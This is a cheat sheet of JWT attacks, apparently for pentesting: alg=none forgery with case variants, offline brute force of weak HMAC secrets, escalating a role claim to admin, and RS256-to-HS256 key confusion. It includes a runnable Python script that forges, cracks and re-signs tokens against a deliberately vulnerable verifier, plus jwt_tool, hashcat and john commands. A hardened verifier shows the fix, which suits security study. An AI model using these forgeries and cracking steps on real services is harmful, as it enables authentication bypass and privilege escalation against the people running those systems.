JWT Vulnerabilities & Exploits
1. "none" Algorithm (unsigned token):
Change header to: {"typ":"JWT","alg":"none"}
Remove the signature but keep the trailing dot: header.payload.
If plain "none" is rejected, try case variants (None, NONE, nOnE); a lenient verifier that lowercases the alg before comparing will still accept them.
2. Weak Secret Brute Force (HS256/HS384/HS512):
Example of a weak secret: weak_secret_key_123
Try common secrets (secret, password, 123456, etc.) and wordlists offline: recompute HMAC over header.payload and compare with the signature. A hit lets you mint any token the server will trust.
3. Modify Payload:
Decode the payload and change role from "user" to "admin" (also look at sub, exp, scopes, and any is_admin style flags)
Re-encode and sign with the cracked/weak secret; without the secret the signature will not match, so this step depends on 1, 2 or 4 succeeding
4. Key Confusion Attack (RS256 -> HS256):
If RS256 is used, change alg to HS256 and sign the token with HMAC-SHA256 using the server's public key as the secret
Use the PEM bytes exactly as the server loads them (same formatting, trailing newline included); a verifier that picks the algorithm from the token header will run HMAC with its RSA public key as the key and accept the forgery
Caveat: modern libraries such as PyJWT refuse PEM-formatted keys for HMAC, so this mostly hits custom or outdated verification code
Example Attack Flow ("none" algorithm):
1. Obtain a legitimate token with role="user"
2. Decode the JWT at jwt.io, or locally (avoid pasting real production tokens into third-party sites)
3. Change payload: "role":"admin"
4. Set algorithm to "none"
5. Remove the signature, keeping the trailing dot
6. Submit the modified token and check whether the server grants admin access
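The four techniques above and the "none" attack flow, worked through end to end as an added example (not code from the original page). It uses only the Python standard library: the HS256 token, the secret weak_secret_key_123, the wordlist and the PUBLIC_KEY_PEM placeholder are all constructed here. vulnerable_verify() shows the bug behind attacks 1 and 4 (choosing the algorithm from the untrusted header with a single key parameter, RSA branch left unimplemented since it is never reached); hardened_verify() shows the fix: pin the expected algorithm before touching any key material.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo values: the page's example weak secret and a tiny wordlist.
SECRET = b"weak_secret_key_123"
WORDLIST = ["secret", "password", "123456", "weak_secret_key_123"]
# Constructed placeholder standing in for the RSA public key PEM exactly as a server loads it.
PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nMIIB...placeholder...\n-----END PUBLIC KEY-----\n"


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_part(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Build header.payload.signature with HMAC-SHA256 over header.payload."""
    signing_input = f"{encode_part(header)}.{encode_part(payload)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def decode_unverified(token: str):
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), s


def forge_alg_none(token: str, **changes) -> str:
    """Attack 1 + 3: set alg=none, edit claims, drop the signature but keep the dot."""
    header, payload, _ = decode_unverified(token)
    header["alg"] = "none"
    payload.update(changes)
    return f"{encode_part(header)}.{encode_part(payload)}."


def crack_hs256(token: str, wordlist):
    """Attack 2: offline brute force of the HMAC secret against header.payload."""
    h, p, s = token.split(".")
    signing_input = f"{h}.{p}".encode()
    target = b64url_decode(s)
    for cand in wordlist:
        digest = hmac.new(cand.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(digest, target):
            return cand
    return None


def vulnerable_verify(token: str, key: bytes) -> dict:
    """Trusts the header: accepts 'none' (any case) and uses whatever key it was
    configured with for HS256, so a PEM public key becomes the HMAC secret."""
    header, payload, s = decode_unverified(token)
    alg = str(header.get("alg", "")).lower()
    if alg == "none":
        return payload
    if alg == "hs256":
        h, p, _ = token.split(".")
        expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return payload
        raise ValueError("bad signature")
    if alg == "rs256":
        raise NotImplementedError("RSA verification needs a crypto library; never reached here")
    raise ValueError("unsupported alg")


def hardened_verify(token: str, key: bytes, expected_alg: str = "HS256") -> dict:
    """Pins the algorithm (exact string match) before any key material is used."""
    header, payload, s = decode_unverified(token)
    if header.get("alg") != expected_alg:
        raise ValueError("unexpected alg")
    if expected_alg != "HS256":
        raise NotImplementedError("only HS256 is implemented in this demo")
    if not s:
        raise ValueError("missing signature")
    h, p, _ = token.split(".")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return payload


def is_rejected(verifier, token: str, key: bytes, **kw) -> bool:
    try:
        verifier(token, key, **kw)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    hdr = {"typ": "JWT", "alg": "HS256"}
    token = sign_hs256(hdr, {"sub": "alice", "role": "user"}, SECRET)
    forged = forge_alg_none(token, role="admin")
    print("alg=none accepted by vulnerable verifier:", vulnerable_verify(forged, SECRET)["role"])
    print("alg=none rejected by hardened verifier:", is_rejected(hardened_verify, forged, SECRET))
    print("cracked secret:", crack_hs256(token, WORDLIST))
    confused = sign_hs256(hdr, {"sub": "alice", "role": "admin"}, PUBLIC_KEY_PEM)
    print("key confusion accepted:", vulnerable_verify(confused, PUBLIC_KEY_PEM)["role"])
```

Once crack_hs256() returns the secret, re-signing a modified payload with sign_hs256() produces a token that even hardened_verify() accepts, which is why attack 3 on its own is only as strong as the secret behind it.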
Tools:
• jwt_tool: python3 jwt_tool.py <JWT> (decode); -C -d wordlist.txt (crack secret); -X a (alg none); -X k -pk public.pem (key confusion)
• hashcat: hashcat -m 16500 jwt.txt wordlist.txt (mode 16500 = JWT; put the raw token in jwt.txt)
• john: john --format=HMAC-SHA256 --wordlist=wordlist.txt jwt.txt (john does not read raw tokens; convert to its HMAC format, header.payload#hexsignature, first)